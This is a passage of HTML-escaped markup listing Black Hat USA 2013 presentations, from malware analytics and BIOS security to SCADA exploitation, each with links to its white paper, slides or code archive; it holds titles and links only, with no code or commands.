href="https://media.blackhat.com/us-13/US-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-Slides.pdf"&gt;US-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-Code.tar.gz"&gt;US-13-Hanif-Binarypig-Scalable-Malware-Analytics-in-Hadoop-Code.tar.gz&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;BIOS Security &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-WP.pdf"&gt;US-13-Butterworth-BIOS-Security-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Slides.pdf"&gt;US-13-Butterworth-BIOS-Security-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Code.zip"&gt;US-13-Butterworth-BIOS-Security-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Black-Box Assessment of Pseudorandom Algorithms &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-WP.pdf"&gt;US-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-Slides.pdf"&gt;US-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-Code.zip"&gt;US-13-Soeder-Black-Box-Assessment-of-Pseudorandom-Algorithms-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Bugalyze.com – Detecting Bugs Using Decompilation and Data Flow Analysis &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Cesare-Bugalyze.com-Detecting-Bugs-Using-Decompilation-WP.pdf"&gt;US-13-Cesare-Bugalyze.com-Detecting-Bugs-Using-Decompilation-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Cesare-Bugalyze.com-Detecting-Bugs-Using-Decompilation-Slides.pdf"&gt;US-13-Cesare-Bugalyze.com-Detecting-Bugs-Using-Decompilation-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Buying into the Bias: Why Vulnerability Statistics Suck &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Martin-Buying-Into-The-Bias-Why-Vulnerability-Statistics-Suck-WP.pdf"&gt;US-13-Martin-Buying-Into-The-Bias-Why-Vulnerability-Statistics-Suck-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Martin-Buying-Into-The-Bias-Why-Vulnerability-Statistics-Suck-Slides.pdf"&gt;US-13-Martin-Buying-Into-The-Bias-Why-Vulnerability-Statistics-Suck-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Combating the Insider Threat at the FBI: Real World Lessons Learned &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Reidy-Combating-the-Insider-Threat-At-The-FBI-Slides.pdf"&gt;US-13-Reidy-Combating-the-Insider-Threat-At-The-FBI-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Compromising Industrial Facilities From 40 Miles Away &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Apa-Compromising-Industrial-Facilities-From-40-Miles-Away-WP.pdf"&gt;US-13-Apa-Compromising-Industrial-Facilities-From-40-Miles-Away-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Apa-Compromising-Industrial-Facilities-From-40-Miles-Away-Slides.pdf"&gt;US-13-Apa-Compromising-Industrial-Facilities-From-40-Miles-Away-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;CreepyDOL: Cheap, Distributed Stalking &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-OConnor-CreepyDOL-Cheap-Distributed-Stalking-WP.pdf"&gt;US-13-OConnor-CreepyDOL-Cheap-Distributed-Stalking-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-OConnor-CreepyDOL-Cheap-Distributed-Stalking-Slides.pdf"&gt;US-13-OConnor-CreepyDOL-Cheap-Distributed-Stalking-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Defending Networks with Incomplete Information: A Machine Learning Approach &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Pinto-Defending-Networks-with-Incomplete-Information-A-Machine-Learning-Approach-WP.pdf"&gt;US-13-Pinto-Defending-Networks-with-Incomplete-Information-A-Machine-Learning-Approach-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Pinto-Defending-Networks-with-Incomplete-Information-A-Machine-Learning-Approach-Slides.pdf"&gt;US-13-Pinto-Defending-Networks-with-Incomplete-Information-A-Machine-Learning-Approach-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;End-to-End Analysis of a Domain Generating Algorithm Malware Family &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf"&gt;US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-Slides.pdf"&gt;US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Energy Fraud and Orchestrated Blackouts: Issues with Wireless Metering Protocols (wM-Bus) &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Brunschwiler-Energy-Fraud-and-Orchestrated-Blackouts-Issues-with-Wireless-Metering-Protocols-WP.pdf"&gt;US-13-Brunschwiler-Energy-Fraud-and-Orchestrated-Blackouts-Issues-with-Wireless-Metering-Protocols-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Brunschwiler-Energy-Fraud-and-Orchestrated-Blackouts-Issues-with-Wireless-Metering-Protocols-Slides.pdf"&gt;US-13-Brunschwiler-Energy-Fraud-and-Orchestrated-Blackouts-Issues-with-Wireless-Metering-Protocols-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Exploiting Network Surveillance Cameras Like a Hollywood Hacker &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-WP.pdf"&gt;US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf"&gt;US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Evading deep inspection for fun and shell &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-WP.pdf"&gt;US-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-Slides.pdf"&gt;US-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-Code.zip"&gt;US-13-Opi-Evading-Deep-Inspection-for-Fun-and-Shell-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;The Factoring Dead: Preparing for the Cryptopocalypse &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/us-13-Stamos-The-Factoring-Dead.pdf"&gt;us-13-Stamos-The-Factoring-Dead.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Fully Arbitrary 802.3 Packet Injection: Maximizing the Ethernet Attack Surface &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Barisani-Fully-Arbitrary-802-3-Packet-Injection-WP.pdf"&gt;US-13-Barisani-Fully-Arbitrary-802-3-Packet-Injection-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Barisani-Fully-Arbitrary-802-3-Packet-Injection-Slides.pdf"&gt;US-13-Barisani-Fully-Arbitrary-802-3-Packet-Injection-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Funderbolt: Adventures in Thunderbolt DMA Attacks &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Sevinsky-Funderbolt-Adventures-in-Thunderbolt-DMA-Attacks-Slides.pdf"&gt;US-13-Sevinsky-Funderbolt-Adventures-in-Thunderbolt-DMA-Attacks-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Hacking like in the Movies: Visualizing Page Tables for Local Exploitation &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-WP.pdf"&gt;US-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-Slides.pdf"&gt;US-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-Pictures.zip"&gt;US-13-Wicherski-Hacking-like-in-the-Movies-Visualizing-Page-Tables-Pictures.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Hacking, Surveilling, and Deceiving victims on Smart TV &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Lee-Hacking-Surveilling-and-Deceiving-Victims-on-Smart-TV-Slides.pdf"&gt;US-13-Lee-Hacking-Surveilling-and-Deceiving-Victims-on-Smart-TV-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Home Invasion v2.0 – Attacking Network-Controlled Hardware &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-WP.pdf"&gt;US-13-Crowley-Home-Invasion-2-0-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-Slides.pdf"&gt;US-13-Crowley-Home-Invasion-2-0-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Crowley-HomeInvasion2-0-Source-Code.zip"&gt;US-13-Crowley-HomeInvasion2-0-Source-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Hot Knives Through Butter: Bypassing Automated Analysis Systems &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Singh-Hot-Knives-Through-Butter-Evading-File-based-Sandboxes-WP.pdf"&gt;US-13-Singh-Hot-Knives-Through-Butter-Evading-File-based-Sandboxes-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Singh-Hot-Knives-Through-Butter-Evading-File-Based-Sandboxes-Slides.pdf"&gt;US-13-Singh-Hot-Knives-Through-Butter-Evading-File-Based-Sandboxes-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;HOW CVSS is DOSsing YOUR PATCHING POLICY (and wasting your money) &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Allodi-HOW-CVSS-is-DOSsing-Your-Patching-Policy-WP.pdf"&gt;US-13-Allodi-HOW-CVSS-is-DOSsing-Your-Patching-Policy-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Allodi-HOW-CVSS-is-DOSsing-Your-Patching-Policy-Slides.pdf"&gt;US-13-Allodi-HOW-CVSS-is-DOSsing-Your-Patching-Policy-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;How to Build a SpyPhone &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-McNamee-How-To-Build-a-SpyPhone-WP.pdf"&gt;US-13-McNamee-How-To-Build-a-SpyPhone-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-McNamee-How-To-Build-a-SpyPhone-Slides.pdf"&gt;US-13-McNamee-How-To-Build-a-SpyPhone-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;How to Grow a TREE (Taint-enabled Reverse Engineering Environment)  From CBASS (Cross-platform Binary Automated Symbolic-execution System) &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Li-How-to-Grow-a-TREE-Code.zip"&gt;US-13-Li-How-to-Grow-a-TREE-Code.zip&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Hunting the Shadows: In Depth Analysis of Escalated APT Attacks &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Yarochkin-In-Depth-Analysis-of-Escalated-APT-Attacks-WP.pdf"&gt;US-13-Yarochkin-In-Depth-Analysis-of-Escalated-APT-Attacks-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Yarochkin-In-Depth-Analysis-of-Escalated-APT-Attacks-Slides.pdf"&gt;US-13-Yarochkin-In-Depth-Analysis-of-Escalated-APT-Attacks-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Is that a government in your network or are you just happy to see me? &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Fiterman-Is-that-a-Government-in-Your-Network-Slides.pdf"&gt;US-13-Fiterman-Is-that-a-Government-in-Your-Network-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Java Every-Days: Exploiting Software Running on 3 Billion Devices &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices-WP.pdf"&gt;US-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices-Slides.pdf"&gt;US-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Javascript Static Security Analysis made easy with JSPrime &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Patnaik-Javascript-Static-Security-Analysis-made-Easy-with-JSPrime-WP.pdf"&gt;US-13-Patnaik-Javascript-Static-Security-Analysis-made-Easy-with-JSPrime-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Patnaik-Javascript-Static-Security-Analysis-made-easy-with-JSPrime-Slides.pdf"&gt;US-13-Patnaik-Javascript-Static-Security-Analysis-made-easy-with-JSPrime-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Just-In-Time Code Reuse: The more things change, the more they stay the same &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Snow-Just-In-Time-Code-Reuse-Slides.pdf"&gt;US-13-Snow-Just-In-Time-Code-Reuse-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Legal Aspects of Full Spectrum Computer Network (Active) Defense &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Clark-Legal-Aspects-of-Full-Spectrum-Computer-Network-Active-Defense-Slides.pdf"&gt;US-13-Clark-Legal-Aspects-of-Full-Spectrum-Computer-Network-Active-Defense-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Mactans: Injecting Malware into iOS Devices via Malicious Chargers &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf"&gt;US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-Slides.pdf"&gt;US-13-Lau-Mactans-Injecting-Malware-into-iOS-Devices-via-Malicious-Chargers-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Mainframes: The Past Will Come Back to Haunt You &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-WP.pdf"&gt;US-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-Slides.pdf"&gt;US-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Maltego Tungsten as a collaborative attack platform &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Temmingh-Maltego-Tungsten-as-a-Collaborative-Attack-Platform-WP.pdf"&gt;US-13-Temmingh-Maltego-Tungsten-as-a-Collaborative-Attack-Platform-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Temmingh-Maltego-Tungsten-as-a-Collaborative-Attack-Platform-Slides.pdf"&gt;US-13-Temmingh-Maltego-Tungsten-as-a-Collaborative-Attack-Platform-Slides.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Multiplexed Wired Attack Surfaces &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Ossmann-Multiplexed-Wired-Attack-Surfaces-WP.pdf"&gt;US-13-Ossmann-Multiplexed-Wired-Attack-Surfaces-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;OptiROP: hunting for ROP gadgets in style &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="https://media.blackhat.com/us-13/US-13-Quynh-OptiROP-Hunting-for-ROP-Gadgets-in-Style-WP.pdf"&gt;US-13-Quynh-OptiROP-Hunting-for-ROP-Gadgets-in-Style-WP.pdf&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;Out of Control: Demonstrating SCADA device exploitation &lt;/span&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: x-small;"&gt;&lt;a 